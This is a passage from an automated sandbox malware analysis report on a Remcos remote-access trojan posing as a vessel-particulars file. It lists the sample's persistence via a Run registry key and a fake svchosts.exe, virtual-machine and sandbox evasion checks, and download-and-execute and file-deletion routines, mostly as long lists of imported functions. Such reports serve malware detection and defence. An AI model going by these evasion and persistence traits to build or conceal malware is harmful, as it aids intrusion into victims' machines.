??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c 17_2_0040A71E
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe File created: C:\Users\user\AppData\Roaming\remcos\svchosts.exe
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run remcos
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_00407D38 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 17_2_00407D38
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 4300, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 2420, type: MEMORY
          Source: Yara match File source: Process Memory Space: MV OLYMPIC PROGRESS VSL PARTICULARS.exe PID: 2584, type: MEMORY
          Source: Yara match File source: Process Memory Space: svchosts.exe PID: 6932, type: MEMORY
          Contains functionality to detect virtual machines (IN, VMware)
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_00401102 in eax, dx 17_2_00401102
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000000.00000002.296655049.000000000271B000.00000004.00000001.sdmp, svchosts.exe, 00000016.00000002.388425515.000000000300A000.00000004.00000001.sdmp, svchosts.exe, 00000017.00000002.407136269.0000000002EAA000.00000004.00000001.sdmp, svchosts.exe, 00000019.00000002.421463243.0000000002A6A000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp Binary or memory string: JSBIEDLL.DLL
          Source: MV OLYMPIC PROGRESS VSL PARTICULARS.exe, svchosts.exe, 00000016.00000002.388465248.0000000003024000.00000004.00000001.sdmp, svchosts.exe, 00000017.00000002.407136269.0000000002EAA000.00000004.00000001.sdmp, svchosts.exe, 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, svchosts.exe, 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, svchosts.exe, 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Uses ping.exe to sleep
          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE PING 127.0.0.1 -n 2
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe TID: 5536 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe TID: 5632 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 2336 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 6600 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 1256 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 1180 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 2920 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 6616 Thread sleep count: 241 > 30
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe TID: 6616 Thread sleep time: -2410000s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\remcos\svchosts.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040376Fh 17_2_0040374A
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe Code function: 17_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040376Fh 17_2_0040374A
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std
@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs17_2_00402C45
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV
?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,17_2_0040BC9B
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_st
ring@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all17_2_00403183
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exe | Code function: 17_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,17_2_00405AFB
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_0040A71E ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,CloseHandle,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,atoi,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_
traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,URLDownloadToFileA,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,ShellExecuteA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c17_2_0040A71E
          Source: C:\Users\user\Desktop\MV OLYMPIC PROGRESS VSL PARTICULARS.exeCode function: 17_2_004057B6 Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@